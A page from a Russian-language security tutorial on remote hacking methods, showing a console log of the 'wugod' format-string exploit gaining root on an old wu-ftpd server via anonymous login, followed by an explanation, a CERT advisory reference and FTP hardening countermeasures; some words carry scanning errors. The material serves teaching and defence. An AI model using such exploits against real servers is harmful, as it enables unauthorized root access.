Иллюстрированный самоучитель по Secure Web


Часто используемые методы удаленного взлома - часть 3


[thunder]# wugod -t 192.168.1.10 -sO

Target: 192.168.1.10 (ftp/<shellcode>):
RedHat 6.2 (?) with wuftpd

2.6.0(1) from rpm

Return Address: 0x08075844, AddrRetAddr:
Oxbfffb028, Shellcode: 152

loggin into system.

USER ftp

331 Guest login ok, send your complete e-mail address as password.

PASS <shellcode>

230-Next time please use your e-mail address as your password

230-for example: joe@thunder

230 Guest login ok, access restrictions apply.

STEP 2 : Skipping, magic number already exists:

[87,01:03,02:01,01:02,04]

STEP 3 : Checking if we can reach our
return address by format string

STEP 4 : Ptr address test: Oxbfffb028
(if it is not Oxbfffb028 ^С

me now)

STEP 5 : Sending code.,
this will take about 10 seconds. Press ^\

to leave shell

Linux shadow 2.2.14-5.0
#1 Tue Mar 7 21:07:39 EST 2000 1686 unknown

uid=0(root) gid=0(root) egid=50(ftp) groups=50(ftp)

Подобная атака оказывается поистине смертельной. Анонимного доступа к уязвимому FTP-серверу, который поддерживает выполнение определенных команд, вполне достаточно, чтобы получить доступ с правами root.

Еще один изъян в системе безопасности, обнаруженный в системе BSD еще в 1993 году, связан с демоном ftpd. Его описание можно найти по адресу http://www.cert.org/advisories/CA-2000-13.html.

Хотя в данной книге этот вопрос подробно рассматриваться не будет, помните о том, что наличие подобного изъяна также может оказаться достаточно опасным.

Контрмеры: защита FTP


Хотя протокол FTP очень полезен, необходимо помнить, что разрешение анонимного доступа к FTP-серверу может весьма пагубно сказаться на "самочувствии" вашего сервера. Оцените необходимость использования FTP-сервера и определите, нужно ли предоставлять возможность анонимного доступа. В таких случаях для защиты сервера необходимо предпринять специальные меры. Очень важно установить самые последние версии модулей обновления, а также запретить или как минимум oipami-чить количество каталогов, в которые разрешена запись всем пользователям. А лучше вовсе откажитесь от таких каталогов.



Начало  Назад  Вперед